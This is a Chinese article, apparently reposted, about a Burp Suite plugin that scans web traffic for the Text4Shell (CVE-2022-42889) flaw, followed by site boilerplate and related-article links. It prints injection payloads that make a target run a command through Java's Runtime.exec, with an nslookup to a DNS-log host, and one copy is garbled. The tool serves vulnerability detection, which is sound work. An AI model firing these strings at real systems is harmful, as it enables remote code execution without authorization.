Text4Shell的burp被動(dòng)掃描插件

項(xiàng)目地址：https://github.com/A0WaQ4/BurpText4ShellScan

簡(jiǎn)介

使用java編寫的Text4shell burp被動(dòng)掃描插件

java maven項(xiàng)目，可以使用mvn package進(jìn)行編譯

更新

1.0 - 首次上傳，對(duì)所有經(jīng)過(guò)burp的包進(jìn)行被動(dòng)掃描，掃描對(duì)象包括了json、xml、fileupload
1.1 - 修復(fù)了body為空時(shí)導(dǎo)致的檢測(cè)錯(cuò)誤，修復(fù)了對(duì)URL參數(shù)不檢測(cè)的錯(cuò)誤
1.2 - 修復(fù)了body僅有json與xml時(shí)出現(xiàn)的參數(shù)構(gòu)造錯(cuò)誤，修復(fù)了dns二次檢測(cè)時(shí)未獲取key導(dǎo)致的錯(cuò)誤
1.3 - 添加了主動(dòng)掃描功能
1.4 - 添加了header黑名單功能，可以在resources/config.yml中修改

payload

- "%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup+dns-url%27%29%7D"
- "${scriptjava.lang.Runtime.getRuntime().exec('nslookup dns-url')}"

可以在resources/config.yml修改

使用

1. 搭建環(huán)境

使用github中的https://github.com/karthikuj/cve-2022-42889-text4shell-docker搭建環(huán)境

2.插件

代理訪問(wèn)http://yourip:80/text4shell/attack?search=aaa，開(kāi)始掃描

在logger中可看見(jiàn)插件發(fā)送的包

僅對(duì)是否可以dnslog進(jìn)行掃描，若dnslog接受到請(qǐng)求，則爆出漏洞

3. 配置

在resources/config.yml中的dnsLogModule修改dnslog配置，使用時(shí)可以修改為自搭建的DnsLog服務(wù)器

免責(zé)聲明

該工具僅用于安全自查檢測(cè)，由于傳播、利用此工具所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，作者不為此承擔(dān)任何責(zé)任。

聲明：本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人，不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用，如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題，請(qǐng)聯(lián)系本站處理。舉報(bào)投訴

服務(wù)器

服務(wù)器

+關(guān)注

關(guān)注
12

文章
8701

瀏覽量
84568
JAVA

JAVA

+關(guān)注

關(guān)注
19

文章
2943

瀏覽量
104110
GitHub

GitHub

+關(guān)注

關(guān)注
3

文章
461

瀏覽量
16237

原文標(biāo)題：Text4Shell的burp被動(dòng)掃描插件

文章出處：【微信號(hào)：菜鳥(niǎo)學(xué)信安，微信公眾號(hào)：菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注！文章轉(zhuǎn)載請(qǐng)注明出處。

評(píng)論

相關(guān)推薦

shell是什么？shell實(shí)現(xiàn)原理分析基于MM32 MCU的shell腳本源碼

在前兩節(jié)中，我們講解了如何在MM32 MCU上使用shell來(lái)輔助開(kāi)發(fā)，分別介紹的是通過(guò)串口方式和J-Link RTT方式的shell，本次課程我們分析源碼來(lái)講解shell實(shí)現(xiàn)原理。軟件資源如下

發(fā)表于 12-02 15:58 ?2403次閱讀

了解鴻蒙OS Text組件

文本（Text）是用來(lái)顯示字符串的組件，在界面上顯示為一塊文本區(qū)域。Text 作為一個(gè)基本組件，有很多擴(kuò)展，常見(jiàn)的有按鈕組件 Button，文本編輯組件 TextField。使用 Text 創(chuàng)建

發(fā)表于 01-29 15:24 ?1063次閱讀

shell編程之shell是什么

reminder that the file contains special text called a shell script.chmod 0755 myfile.sh

發(fā)表于 11-26 16:00

Linux Shell系列教程之Shell while循環(huán)及特點(diǎn)

循環(huán)處理時(shí)，COUNTER加1，直到COUNT為5后終止?！　≥敵觯骸　?　　2　　3　　4　　5　　例子2：　　#!/bin/bash　　while read text　　do　　echo

發(fā)表于 09-04 15:21

在RN4020,中央或觀察員角色執(zhí)行主動(dòng)掃描還是被動(dòng)掃描？

在RN4020，中央或觀察員角色執(zhí)行“主動(dòng)”掃描還是“被動(dòng)掃描”？也就是說(shuō)，RN4020在掃描時(shí)發(fā)送，還是只接收廣播/廣告？我讀過(guò)一些BLE模塊發(fā)送

發(fā)表于 05-07 08:21

一些接插件及被動(dòng)元器件的3D模型

一些接插件，電阻，電解電容，三極管等被動(dòng)元器件的3D模型，有需要的拿走

發(fā)表于 11-10 11:17

UNIX[1].shell范例精解(第4版)_code

電子發(fā)燒友網(wǎng)站提供《UNIX[1].shell范例精解(第4版)_code.txt》資料免費(fèi)下載

發(fā)表于 04-23 20:57 ?0次下載

[Shell腳本專家指南]人民郵電出版社.掃描版

電子發(fā)燒友網(wǎng)站提供《[Shell腳本專家指南]人民郵電出版社.掃描版.txt》資料免費(fèi)下載

發(fā)表于 02-06 16:46 ?0次下載

免安裝代碼編輯器Sublime Text3已經(jīng)安裝好各種功能插件應(yīng)用程序

本文檔的主要內(nèi)容詳細(xì)介紹的是免安裝代碼編輯器Sublime Text3已經(jīng)安裝好各種功能插件應(yīng)用程序免費(fèi)下載。

發(fā)表于 03-27 08:00 ?29次下載

Linux中shell腳本執(zhí)的4種方式

Linux中shell腳本的執(zhí)行通常有4種方式，分別為工作目錄執(zhí)行，絕對(duì)路徑執(zhí)行，sh執(zhí)行，shell環(huán)境執(zhí)行。

發(fā)表于 05-23 09:28 ?871次閱讀

FOFA聯(lián)動(dòng)XRAY小工具：XRAY-F

代理到Burp然后Burp再代理到Xray這樣既可以聯(lián)動(dòng)Burp的插件如Shiro，F(xiàn)astJson插件也可以使用

發(fā)表于 10-26 10:25 ?786次閱讀

【Tools】被動(dòng)掃描工具EPScan

被動(dòng)收集資產(chǎn)并自動(dòng)進(jìn)行SQL注入檢測(cè)（插件化自動(dòng)Bypass）、XSS檢測(cè)、RCE檢測(cè)、敏感信息檢測(cè)。

發(fā)表于 12-05 10:47 ?762次閱讀

shell腳本基礎(chǔ)知識(shí)匯總4

Shell 編程跟 JavaScript、php 編程一樣，只要有一個(gè)能編寫代碼的文本編輯器和一個(gè)能解釋執(zhí)行的腳本解釋器就可以了。 Linux 的 Shell 種類眾多，常見(jiàn)的有：

發(fā)表于 02-15 10:49 ?596次閱讀

BurpSuite多功能輔助插件配置介紹

介紹 knife是一個(gè)BurpSuite插件，主要目的是對(duì)Burp做一些小的改進(jìn)，讓使用更方便。就像用一把小刀對(duì)Burp進(jìn)行小小的雕刻，故名“knife”。注意事項(xiàng) 使用插件前，請(qǐng)先

發(fā)表于 05-18 14:45 ?1412次閱讀

Sublime Text 4 Build 4169文本編輯器的新功能

Sublime Text 4 Build 4169 帶來(lái)了改進(jìn)的語(yǔ)法高亮、易于選擇字體、增量索引排序以及其他功能。

發(fā)表于 12-03 11:12 ?888次閱讀